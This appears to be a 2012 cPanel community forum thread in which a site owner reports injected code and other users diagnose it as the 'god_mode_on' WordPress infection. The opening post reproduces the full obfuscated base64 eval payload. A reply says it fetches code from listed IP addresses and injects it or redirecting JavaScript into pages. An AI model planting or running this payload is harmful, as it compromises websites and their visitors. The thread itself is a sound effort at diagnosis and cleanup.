The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Has my server been hacked?

Discussion in 'Security' started by ChildOTK, Mar 15, 2012.

  1. ChildOTK

    ChildOTK Member

    Joined:
    Aug 2, 2011
    Messages:
    18
    Likes Received:
    0
    Trophy Points:
    1
    Good Day,

    We noticed this morning some really suspicious code in our files:

    Code:
    /*god_mode_on*/eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBvVmpGc2JsTXdUa2RpVjFKWVRsZHdhMUl5ZURKWmJYYzFZa2RXU0dKSWNHdFRSVEYyVldwS1YwMUdVbGhTYmxKYVZUSjBkMXBVU21GTlYwcDBWR3BDYUZaNmJERlRWV00xWkRGc1dFNVlTbWhWTW1SeVYxYzFWMkpWZEZsak1uUmhUV3BzY2xkRVNYaGtiSEJJVmxka1VWVXdSbkpYUkVaUFVteFdjMWRyV2xaaVNFNXdWMnBKTldSc2NFUlRiVkpRWlZWS05scEZhRXRhYlU1MFZtNWthVkl3V25GWGJFNXVZVmRHU1ZOdGVHRmhWV3g2VTFjeGIyVldjRmhYVjJ4TlUwVTBkMWt5TlZOa2JVcElUMVJPWVZkRmJIWlRhMlJMVFZad2NHRXpUa3RTTURVeFdrVlpOV0l3ZEZWak1tUnFUVEZLTlZkRVRrdGlSMDVJWlVkb1drMXNWblpUVjNBelRESldTRTFZVGtwaFdHUndWVVZSTlU1SFNsaGtNbXhOVTBVMGQxa3lOVk5rYlVwSVQxUk9ZVmRGYkhaVGEyUkxUVlp3Y0dFelRrdFNNRFV4V2tWWk5VNUZkRlZqTW1SS1VqSjRkRk5WVG01aU1IQklWRzVXYTFKcWJIWlRWVkV3V2pBeGNHRXlNVXRoVjJSeVYxUkpNVTFHWjNwYU1tUlJWa1JDYmxSVlRuSmpSV3hKWXpKMFdtSnNXblJUVlZGM1dqQndTRnBJV21GU2Ftd3dXV3BLVTJKRmJFUk9SMlJMVWpCdmVGZHRjREJQVld4SlUyMTRhMU5HV2pWWmJXeENZVEZzZFZadE1WQmxWVWsxVTFWa1lVMVhTblJVYWtKb1ZucHNNVk5WVm10aVIxSkdUVmRvYVZZd1ZuWlRNV2g2WVRKS1dFOVVRbWhTTVZvMVUxVlJkMW93YkhWYVJFNXJaVlJXY1ZkdE1EQmtWMGw2VTIwMVNtRnVValZYYkdoVFRWZE9kRTVIWkV0U2VrWXlXa1ZrYjJKSFRuRmtSR3hwVFd0d2JWbDZUbE5oUjA1MVZWYzVTbUpVYkROWFZtTXhZMjFHVkZOWVFsQmxWa28yV1ZWak5VMHdiRVZOUjJSaFlsVmFlbGw2U2xaT01YQjFWbTVXV2sweFNuZFpha2t3V2pGc1dHRkhNV3RXTVVwMFdXdGtZVTVzY0VoaFJ6Rm9VMFV4ZGxOcmFFTmhSWFJaWkVjMWFWSjZiSEJYVm1ReldqQndTVlJ0T1dsTk1rMHpVMVZrYTJNeVNYbFRiV2hwVVRCR2NsZHFTVFZoTVdkNVRWaGFZVkl4VlROVFZVNVRaRVpzV0UxWGFFcFNSRUp1VldwS1YwMUdVbGhTYmxKYVZUSmtkMVF6YkZOaVYwWllaVWQ0U2xKRVFtNWFSbWhMWXpGd1dFNVhjR2xOYkVwelV6QlpOVnBzU25KaVJURlRWbXBzYlZNeFVqQmpSbkJ3VVZjNWFGZEZOVFpYYkdoU1lqQndSMDlXVWxOV2EzQllWV3hhUzFscmJISmhSbFpYVW10S2JWVXdWVFZXUmxwRVUyMVNURlV5ZHpOVGEyUnZaRzFOZWxWWFpGRlZNRVp5VjBSR1QxSnNWbk5YYTFwV1lraE9jRlV3V2xOV1ZsWkhUMVZzVlUxVk5WWlRWM2QzVGpKYVdHSkhNVXBSTW1oM1dYcE9UMkpIVWtSYU1uUlpUVlUxUjFaWGVHRlNiRlp6WXpKc1ZtRXhXazlXUkVaVFVteG5kMUpyVmxOU2EyeHdWMFpPY21OSFZqVlZia0pxVVRCRk5WTlZUbE5hYkZWM1ZteE9WMkV4V2xSV00yeExWVEZLVmsxV1FsZFNWbHB0VlZaV1UxSldWbkJUYlZKUVRYcEdkMWR0YkVKaU1rWlpWRzV3WVZkR1JuWlRhMWsxVmtaS1YxTnNaRk5XYTNCcFUxZDBiMVpXV2tkUmJWcFdZVEZhU0ZWc1drdFNiRlp3VTIxU1RGVXlkek5UYTJoTFlrWndjRkZVYkVwVFJsbzFXV3RrVjJSV2EzbFBWM1JoVlRKa2NsZEVSazlTYkZaelYydGFWbUpJVG5CVk1GcFRWbFpXUjA5V1RsTldWbkJIVmxkMFYxVXdiSE5OU0VKUVRYcEdkMWR0YkVKaU1rWlpWRzV3WVZkR1JuWlRhMWsxVmtaS1YxTnNaRk5XYTNCcFUxZDBiMVpXV2tkUmJWcFhWbXMxUjFaWGR6VlJiRWwzVm1zNVYxRXdjR3RUTVU1elRqQndTVlp0YUVwU1JFSnVXa1pvUzJNeGNGaE9WM0JwVFd4S2MxTXdhRTlOUjA1MVZXNWFhVko2YTNwWGJHaEtZakJ3UjA5V1VsTldhM0JZVld4YVMxbHJiSEpoUmxaWFVtdEtiVlpzV2s5U2JGWnpUMVZLVTAxR1dsQldhMDVMV2tWMFZHRjZaRzFWTVVsNFdUSXhNMW94UWxSUlYyeG9VMFpKZDFrd1VuWmthM2cxVTFka1RXRlZSbkpaTUdSR1dqQjRjRkZYYkUxTmFtd3pXVEJOTVdReVJrbFJVemxwVm5wcmQxbFZaRmRsVmtKVVUxZGtUV0ZXU2pCWFZtTjRZVVZzUkU1SFpFcGhWbkIwV1Zaa05HSkdRbFJUVjJSTllWVkdjbGR0TVhOak1YQlVVVmhXU2xFd2JIUlpWV00xWlcxU1JVMUhiRXBSZWxKdVUydGtiMlJ0VFhwVlYyUk5ZVlZHY0ZOdE1YTmtNVUpVVTFka1RXRlZSbkpaVm1oQ1dqQjRjRkZYYkV0aWEzQnpWMjF2ZDJGVmJFUk9SMlJMVTBWd2MxZHRiRUprVld4RVUxY3hhMVl3VlRWVFYyeENaRlZ3U1ZadGFGQk5iWGgwVXpCT1EySlhVbGhPVjNCclVqSjRNbGx0ZHpWaVIxWklZa2h3YTFORk1YWlRWekZQVFZkT2RHVkhXbWhXZWxaM1drVk9TbU5GYkVSaVJHUkxVakExZGxOVlVYZGFNV3Q2Vm01c2FWSnFiSGRaYlRGelRVVjBSRlZxUm1waVdHUjNWSHBLVDAxWFRuUmxSMXBxVFd4WmQxbHFUa05OUlhSRVZXMXdhRkV6Wkc1VlZFWlhWVEZTUms5V1JsZFNhbXhVVld4YVUxWnNWbkpPVmxaV1lUQmFVRlpVUW1GU2JGWndaREprVGxVeWN6TlhWRTVYWlZkS1IwOVljR0ZYUmtveVdUQm9VbUl3Y0VoVWJUbE5VVEJLUlZac1drdFVWbEY0VVd4V1dVMVdTa3RXUmxaWFZVWmFWMVZZVGtwU1JURjNWRE5zVTAxWFNrbFZWMlJSVlRCS2NWcEdhRXRqTVdkNVZtcFNZVll3TVhaVGEyUlBZakIwVldSRWJFcFNNVnA2V1hwS1Zsb3lWalZWYWtacFUwWkdibFZHVGtOUlZuQjBZa2hPWVZacWJIVlhiR2hUV214cmVVOVlWbXRTTVZveFdrVm9UbUl3Y0VsV2JteHBVVEp6TTFwc1RrTmpSbkJ3VVZjNWFrMHhTalZaTUdNMVpXdDBSRlZxUm1sVFJrWjZVMWN4VjAxc2JGaGtNbXhNVlRCR2IxVkdVWGRhTVhCMFVtNU9hazFzVm5kYVdHeFRUbXRzUlUxSFpHcE5NVW8xVjBST1MySkhUa2hsUjJoYVRXeFdkbE5YTVZkTmJHeFlaREpzVFZFd2JIQlVSVTVUVFZkS1NWVllRbEJsVlVweldrY3hSMk13ZEVSVmFscE1Wa2hPYmxOcmFFOWlNa2w2V1RKa1VWVXdTWGRaTWpWWFlrVTVOVkZ1YkdGWFJrbDRXVEl3TUZveVVrbFRha1poVmtoUk5WTlZaSE5pVld4RVlVaHdhMU5GY0ROWmFrNU9ZakJ3U1ZadVRtdFJNMlJ3VjJ4a1MyUldiRlJUV0VKS1VUQlZOVlZHVGtOaVZteFlaVWh3WVZVeWR6TlRhMmgyV2pGQ1ZGRnVjR3RUUlhCdFdUSXhWMlF5U2toU2JYQmhWVEprY0Zkc1pFdGtWbXhVVTFoT1NtRlZiSHBUYTJoWFl6SlNSR0Y2WkVwUk1VcDFXV3BLVTFwdFNsaFBWM1JoVlRCRk5WTlZUbE5PYXprMVVWZDBhazF0YURKYVNHeENUMVZzU1ZWdWJHdFdNVlV6VTFWb1MySkhVa2xXYm14cFlWVkpkMWt5TlZkaVJUazFVVmQwV1UxVk5VZFdWM2hoVW14V2MyTXliR0ZOYW13eVYydE9TMXBGYkVWTlIyUkxVakpTTWxkcldUVmtSMGw1VlcxNFVHVlZTVFZUVldSWFl6Sk5lVlpYWkd4Tk1IQnpXa1ZvVjJWWFNuQlJiVEZhVmpOb05sZHNVakJQVjFwVVZXMHhXbGRHU25aWGJHaExXV3hvVkZGVWJFcFJNR3cwVkd0U1dtUlZNVlZhZWtaTllXdHJlRlJyVFRCbFZUVkZWbGRzVUdWV1NuUlhWbWhUWWpGd1dWTnRTbGxWTUVVMVUxVk9TbVZyTVZST1NHaFFVa1pHTVZSWGNGSmxWWGh4VWxoa1RtVlZhek5UYTJSaFlVZFNTR0ZIZUdwaVNGSnJVMVZSZDFvd2JIRmhNMmhOWVd0Vk1WUnRhekJsVlRGVlYxaFdUbFpHUlRCVFYzQjZZVEZ3ZEZKcVFtaFNNVm8xVm5wRmQxb3hRbFJSVjJ4UVZrVldNVlJXVW5KTmEzaHhVMWhvVDJGVVVYZFVNVTVLVGpGd2RFOVliR0ZXTUZweFdWVk9ibUV4Y0hSU2FrSm9VakZhTlZOVlpFZGxhMnhFVldwR2FtRlhkek5aVm1SYVdqQjBSRkZ0YUdoU01XOTRWMnRrWVdNeGNIVmpSM1JvVWpGd2Rsa3piRzVoTWxKWlUxaENTbEV5ZEc1YVdHeERZVmRPZEZadGFHaGxWVVV6V214bmVHTkdjSEJSVnpsTFUwVTFkbGxxVG1wYU1VSlZUVVJzU2xJeGNHOVphMmhQWWtWMFdXTXlkR3BOYXpVMVdWWm9RMDFHUWxSWmVtaHFUV3MxTlZsV2FFTk5Sa0oxVjIxb2FtRlZTbTFVVldodVRrWnNXRk5VVGxGV2JrNXdWMFZvYm1Wck1WZGxSRkpPWld4S2FscFZVazVOYkdoSldqTnNVMVp1WnpCVVdIQkhXVEpXUlZSVVVsbFRSMlEyVkd4YU5FNUZNWEpXYlU1c1VrVXhOVmRGYUc1bGF6VlhaVVJTVG1Wc1NtcGFWVkpMVW14b1NWb3pjRTVpU0djd1ZGaHdVMWt5VmtWVVZFWktZVmhrY0ZkRmFHNWxhekI0WlVSU1RtVnJXbXBhVlZKTFVteG9TVm96Y0U1V2JtY3dWRmh3YjFreVZrVlVWRUpaVTBka05WVnNXalJPUlRFMlUyMU9iRkpGTUhkWFJXaHVaV3N4YzJWRVVrNWhNVnBxV2xWU1RtVkdhRWxhTTNCT1VtNW5NRlJZY0U1aFZYaEVVMjFPYkZKRk1ERlhSV2h1WldzeFYyVkVVazVoTVZwcVdsVlNUbVZHYUVsYU0zQlFWbTVuTUZSWWNHRlpNbFpGVTJ0YVdWTkhaRFpVVjNnMFRrVXhObEp0VG14U1JUQjVWMFZvYm1WV1NsZGxSRkpPWld0YWFscFZVazVOUm1oSldqTndVRkV3YkhwVFYzZzBUa1V4Tm1KSFRteFNSVEUwVjBWb2JtVldTbGRsUkZKT1pXdGFhbHBWVWs1T1ZtaEpXak53VDJKSVp6QlVWM1JYV1RKV1JWUlliRmxUUjJRMlZGWmFORTVGTVRaWGJVNXNVa1Z3UjFkRmFHNWxhelZIWlVSU1RtVnRkSEJVUlU1TFdUSldSVmt6Y0ZsVFIyTjVWRlJHTkU1Rk5UWlRiVTVzVWtack1WZEZhRzVOTURGSFpVUlNUMlZzUm5CVVJVNUxXVEpXUlZkWWNGbFRSMk42VkZkNE5FNUZOWEZXYlU1c1VrWnNORmRGYUc1Tk1EVkhaVVJTVDJGc1dtcGFWVkpTVFZab1NWcDZTbEpOV0djd1ZHMXdWMWt5VmtWWGExWlpVMGRqZVZSc1dqUk9SVFZ5Vm0xT2JGSkhUWGRUVjJ3ellWWm9TVnA2VGs1TldHY3dWRzV3UzFreVZrVlhXSEJLWVZoa2NGZEZhRzVOYXpsSFpVUlNUMlZzU21wYVZWSnFUVVpvU1ZwNlRrNVNibWN3VkZSQ1Ixa3lWa1ZUYTJSWlUwZGtOVlZ0YkVwak1HeHpaVVJTVG1FeGNHcGFWVkpxWld4b1NWb3piRk5XYm1jd1ZHNXdRMWt5VmtWWFZGSlpVMGRqZWxSVlRrcGpNR3h6WlVSU1QyRnRhR3BhVlZKYVRWWm9TVnA2U2s1V2JtY3dWRzF3VW1GVmVFUlRiVTVzVWtacmVsZEZhRzVOYXpWWFpVUlNUMlZzU21wYVZWSlNUVlpvU1ZwNlNsSk5XR2N3Vkcxd1Yxa3lWa1ZYYTFaWlUwZGplVlJzV2pST1JUVnlWbTFPYkZKSFRYZFhSV2h1VFRBd2VHVkVVazlTUlhCcVdsVlNhazVXYUVsYWVrWlBVbTVuTUZSdGNFZFpNbFpGVjFST1dWTkhZM2RWYkZvMFRrVTFjVkp0VG14U1JuQkdWMFZvYmsxck5WUlRXRTVLWWtobk1GUnRjRWRaTWxaRldUTmtXVk5IWTNwVVZWbzBUa1UxY1ZadFRteFNSbkJIVjBWb2JrMXJOVWRsUkZKUFVrVTFhbHBWVWxwT1JtaEpXbnBLVUZadVp6QlViWFJQV1RKV1JWZFVRa3BpUkVFeldrY3hSMlZWYkVkUFNHUnNVakJXTmxSclVrWlBWbU40VDBoa2JGSkhhRzlYVjNCcldXc3hSMDFJVGxsbGEwa3dWREJrUjJGVk5IaGpNMmhaVlROb2JWUlZhRzVPUm14WVUxUk9XR1ZyY0d0VVJWazBaREpXUldGSGFGcGhiVkpwVkZSRmVGcEZPSGxYYmxwcVlWZG5lVmRXYUVwYU1rWlVVVzVDYVdGVlNtMVVWV2h2WVVVeE5sVllhRXhYU0ZGNVYxWm9TbG95Um5WVVZHeGhVbnBzY1ZwR1kzaGlSMHAxVlcxS1dXVnJTVEJVTUdSSFlWVTBlR042UmxsV2FrSjJWMGh3UTA1Rk9VaFNiV3hQVFZoTmQxZEdUbkpPTWtaMVZHMUtXV1ZyU1RCVU1HUkhZVlUwZUdONlNsbFdha0UxVjBod1EwNUZPVWhTYld4UFRWaE5lbGRHVGpCYWF6RkpZVWRvVG1Wc1JqUldla3B6V2tWemVFOUlaR3hTUjJodlYxZHdhMWxyT1VkTlJHUnJZbFZhTlZOVlpHOWlSbXhZVlZSc1lWSjZiSEZhUm1ONFlrZEtkVlZ0U2xsbGEwa3dWREJrUjJGVk5IaGpNMmhPVW1wR2ExTXdXVFJrTWxaRllVZG9XbUZ0VW1sVU1WbDNZMFprTmxGdFVsQk5iV2h6VjFaa1UxbHNhRFpSYWxKUVVqQmFjRlJxUm5wbFJURlhUVmRTVEZJelFqWlRNVkl3VDFWc1JXTjZhRTFOTURWeFdUSXhjMlF5VWtWT1J6VlFaVlZHYmxOclpHdGtiSEJIVDFoU2FVMXNTbk5UVlZGM1dqQndTVlJ0Y0dwaVYzZ3pXa1ZTTUU5VmJFUlZiVnBXVFVaYVZGWnRkRmRWTVdRMVUyMDFhVTFxYkhKVFYzZDNXakZDVkZGWGRHRk5hbXh5VjBSSmVHUnNjRWhXVkdSS1UwUkJPVWxwYTNCUGVVRTlJaWtwT3lBPSIpKTsg")); /*god_mode_off*/
    
    When trying to decode the string it appears to be exactly the same code and looks like an endless loop.

    Several files have this code added and the last modified date and time was this morning at 8:05am.

    I checked /var/log/messages for activity around that time and the only think I could find was this:

    Code:
    Mar 15 08:05:47 w1 kernel: php[12447]: segfault at 00007fff806f6ae8 rip 00002b08051a1c38 rsp 00007fff806f6ad0 error 6
    
    Does anybody have any idea what this is or what I can do about it?

    I have IPTABLES setup as best I can on the server, and the logs didn't show any suspicious activity either, so I don't understand.

    Thank you!
     
  2. storminternet

    storminternet Well-Known Member

    Joined:
    Nov 2, 2011
    Messages:
    462
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Root Administrator
    Make sure that your server is running with updated kernel and updated version of mod_security. mod_security helps to prevent web base intrusion. If the files are infected, better to restore them from the backup.
     
  3. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,450
    Likes Received:
    195
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
    Suspend that account or accounts and hire a professional to assist you with this. My guess is that you have indeed been compromised.

    There are many good System Admin Companies listed here:
    Sys Admin Services « cPanel Application Catalog

    Assisting with cleaning up a compromised server is a bit out of the scope of these, or any forums, really.
     
  4. brumie

    brumie Active Member

    Joined:
    Dec 9, 2003
    Messages:
    42
    Likes Received:
    0
    Trophy Points:
    6
    happen to me as well today, looks like this is mass injection!
     
  5. th3joker

    th3joker Member

    Joined:
    Mar 12, 2012
    Messages:
    12
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    I would look at adding some or all of the following to harden the server:

    CSF (Firewall) free and integrates with cpanel/whm quite nicely
    fail2ban
    portsentry
    chkrootkit
    rkhunter
    securetmp
    clam (Anti Virus)

    In your hosts.allow add in your IP's then deny all services to everyone else except httpd.

    hosts.allow on it's own isn't sufficient, you should have multiple levels of security.

    If you need some help we can point you in the right direction.
     
  6. th3joker

    th3joker Member

    Joined:
    Mar 12, 2012
    Messages:
    12
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    Our original hosting was shared and the host company was useless we got hacked constantly and gave up and bought our own dedicated server in the end.

    Our logs are full of hack attempts and port scans etc..
     
  7. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,450
    Likes Received:
    195
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
    If the cPanel account or website password has been compromised you'll find it very tough to stop this sort of thing from happening. Scans to find vulnerable scripts and poke them are very common.

    Keeping all scripts and mods to them, up to date, and using very strong passwords may still not be enough if the user gets infected on his local computer and all his passwords are stolen. And then used.

    There's a lot more to Hosting than just putting up a server and adding a website. Lots more. If you're unsure of how to setup good security to help protect your work, hire someone. The cost of hiring a professional is much less than the grief you go thru once you've been hacked and all your customers move out, like th3joker has done.
     
  8. alphawolf50

    alphawolf50 Well-Known Member

    Joined:
    Apr 28, 2011
    Messages:
    186
    Likes Received:
    2
    Trophy Points:
    18
    cPanel Access Level:
    Root Administrator
    The base64 encoded string isn't an endless loop, just a long one. While you're getting this situation handled, it would be a good idea to block these specific IP addresses referenced by the attack code:

    146.185.254.245
    31.184.242.103
    91.196.216.148
    91.196.216.49

    The script downloads some (unknown) code from those IP addresses and injects it into your pages. If it can't do that, it injects some javascript into the pages instead. The javascript looks like it tries to direct the client to one of those IP addresses.

    This seems to be a WordPress exploit. This thread at wordpress.org has lots of information regarding how to clean up the issue, and how you might have gotten infected:

    WordPress › Support » I think my site has been hacked. Please Help ASAP?
     
  9. wpchamp

    wpchamp Registered

    Joined:
    Mar 20, 2012
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Website Owner
    Hello there,

    It appears you have been hit with the "god mode on" wordpress virus. There's a good guide on how to get rid of it here:

    /http://marketingsiden.dk/how-to-remove-god_mode_on-wordpress-virus/

    Best Regards
    wpchamp
     
Loading...

Share This Page